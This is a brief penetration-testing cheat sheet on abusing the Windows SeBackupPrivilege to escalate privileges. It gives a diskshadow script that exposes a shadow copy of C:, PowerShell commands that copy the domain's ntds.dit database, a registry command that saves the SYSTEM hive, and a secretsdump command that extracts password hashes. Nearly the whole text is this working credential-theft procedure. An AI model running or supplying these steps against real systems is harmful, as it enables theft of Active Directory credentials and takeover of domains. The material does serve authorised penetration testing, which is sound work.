1.0 KiB
1.0 KiB
SEBackupPrivilege Escalation
- Check user privileges to escalate
Usage
- Check
whoami /all
SeBackupPrivilege
must be present- Payloads all the things
- Upload
diskshadow.txt
to the target with the following content
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:
- Change dir to
C:\Windows\System32
anddiskshadow.exe /s C:\Path\to\diskshadow.txt
- Upload these dlls to the target
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\Path\to\uploads\system
- Downloads the files
ntds.dit
andsystem
- Extract the hashes via
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt